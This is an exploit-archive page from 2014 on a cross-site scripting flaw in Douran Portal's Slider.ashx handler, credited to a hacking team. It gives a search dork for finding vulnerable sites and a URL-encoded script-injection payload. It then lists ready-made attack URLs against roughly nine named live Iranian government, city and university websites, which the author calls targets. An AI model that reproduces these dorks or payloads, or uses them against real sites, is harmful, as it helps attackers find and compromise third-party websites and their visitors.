Douran Portal Cross Site Scripting

2014.12.09

Credit: E1.Coders

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

Dork: inurl:/DesktopModules/Slider/Handlers/Slider.ashx?ModuleID=

#########################################################################################################################
#                                                                                                                       #
# Exploit Title : DOURAN Portal XSS Vulnerabilities                                                                     #
#                                                                                                                       #
# Author        : E1.Coders                                                                                             #
#                                                                                                                       #
# Contact       : E1.Coders [at] Mail [dot] RU                                                                          #
#                                                                                                                       #
# Portal Link   : www.DOURAN.com                                                                                        #
#                                                                                                                       #
# Tested ON     : All ver 0f Douran Portal                                                                              #
#                                                                                                                       #
# Security Risk : High                                                                                                  #
#                                                                                                                       #
# Description   : All target's iranian GOVerment websites                                                               #
#                                                                                                                       #
#  DorK         : "DOURAN Portal"                                                                                       #
#                                                                                                                       #
#   OR          : ""inurl:/DesktopModules/Slider/Handlers/Slider.ashx?ModuleID=""                                       #                                           #
#                                                                                                                       #
#########################################################################################################################
#                                                                                                                       #
#  Expl0iTs:                                                                                                            #
#                                                                                                                       #
#  1: www.DOURAN.com/DesktopModules/Slider/Handlers/Slider.ashx?ModuleID=15246&Width=960&Height=180&TT=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert%280x00038E%29%3C/scRipt%3E&TDU=2&TDE=2&Auto=true&Stop=true&Loop=false&Bullets=true&Captions=false&CaptionEffect=move&Controls=true&Theme=Quiet&RTL=True#
#                                                                                                                       #
#                                                                                                                       #
#  Dem0 : http://mohrcity.ir/DesktopModules/Slider/Handlers/Slider.ashx?ModuleID=15246&Width=960&Height=180&TT=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert%280x00038E%29%3C/scRipt%3E&TDU=2&TDE=2&Auto=true&Stop=true&Loop=false&Bullets=true&Captions=false&CaptionEffect=move&Controls=true&Theme=Quiet&RTL=True#
#                                                                                                                       #
#                                                                                                                       #
#  Dem0 : http://www.tehranbtc.ir/DesktopModules/Slider/Handlers/Slider.ashx?ModuleID=15246&Width=960&Height=180&TT=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert%280x00038E%29%3C/scRipt%3E&TDU=2&TDE=2&Auto=true&Stop=true&Loop=false&Bullets=true&Captions=false&CaptionEffect=move&Controls=true&Theme=Quiet&RTL=True#
#                                                                                                                       #
#                                                                                                                       #
#  Dem0 : http://www.manzarie.ir/DesktopModules/Slider/Handlers/Slider.ashx?ModuleID=15246&Width=960&Height=180&TT=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert%280x00038E%29%3C/scRipt%3E&TDU=2&TDE=2&Auto=true&Stop=true&Loop=false&Bullets=true&Captions=false&CaptionEffect=move&Controls=true&Theme=Quiet&RTL=True#
#                                                                                                                       #
#                                                                                                                       #
#  Dem0 : http://kish.ir/DesktopModules/Slider/Handlers/Slider.ashx?ModuleID=15246&Width=960&Height=180&TT=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert%280x00038E%29%3C/scRipt%3E&TDU=2&TDE=2&Auto=true&Stop=true&Loop=false&Bullets=true&Captions=false&CaptionEffect=move&Controls=true&Theme=Quiet&RTL=True#
#                                                                                                                       #
#                                                                                                                       #
#                                                                                                                       #
#  Dem0 : http://dcco.ir/DesktopModules/Slider/Handlers/Slider.ashx?ModuleID=15246&Width=960&Height=180&TT=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert%280x00038E%29%3C/scRipt%3E&TDU=2&TDE=2&Auto=true&Stop=true&Loop=false&Bullets=true&Captions=false&CaptionEffect=move&Controls=true&Theme=Quiet&RTL=True#
#                                                                                                                       #
#                                                                                                                       #
#                                                                                                                       #
#  Dem0 : http://www.mashhadrizehcity.ir/DesktopModules/Slider/Handlers/Slider.ashx?ModuleID=15246&Width=960&Height=180&TT=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert%280x00038E%29%3C/scRipt%3E&TDU=2&TDE=2&Auto=true&Stop=true&Loop=false&Bullets=true&Captions=false&CaptionEffect=move&Controls=true&Theme=Quiet&RTL=True#
#                                                                                                                       #
#                                                                                                                       #
#                                                                                                                       #
#  Dem0 : http://www.atr.ac.ir/DesktopModules/Slider/Handlers/Slider.ashx?ModuleID=15246&Width=960&Height=180&TT=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert%280x00038E%29%3C/scRipt%3E&TDU=2&TDE=2&Auto=true&Stop=true&Loop=false&Bullets=true&Captions=false&CaptionEffect=move&Controls=true&Theme=Quiet&RTL=True#
#                                                                                                                       #
#                                                                                                                       #
#                                                                                                                       #
#  Dem0 : http://www.fums.ac.ir/DesktopModules/Slider/Handlers/Slider.ashx?ModuleID=15246&Width=960&Height=180&TT=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert%280x00038E%29%3C/scRipt%3E&TDU=2&TDE=2&Auto=true&Stop=true&Loop=false&Bullets=true&Captions=false&CaptionEffect=move&Controls=true&Theme=Quiet&RTL=True#
#                                                                                                                       #
#                                                                                                                       #
#                                                                                                                       #
# Dem0 : http://jums.ac.ir/DesktopModules/Slider/Handlers/Slider.ashx?ModuleID=15246&Width=960&Height=180&TT=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert%280x00038E%29%3C/scRipt%3E&TDU=2&TDE=2&Auto=true&Stop=true&Loop=false&Bullets=true&Captions=false&CaptionEffect=move&Controls=true&Theme=Quiet&RTL=True#
#                                                                                                                       #
#                                                                                                                       #
#########################################################################################################################
#                                                                                                                       #
#         Greetz : | MR.F@RDIN  | Mr.PERSIA  | H!dd$n D@gg$r | DR.OMID | Acc | & All Member Empror-Team |               #
#                                                                                                                       #
#########################################################################################################################

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Douran Portal Cross Site Scripting

Dork: inurl:/DesktopModules/Slider/Handlers/Slider.ashx?ModuleID=

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.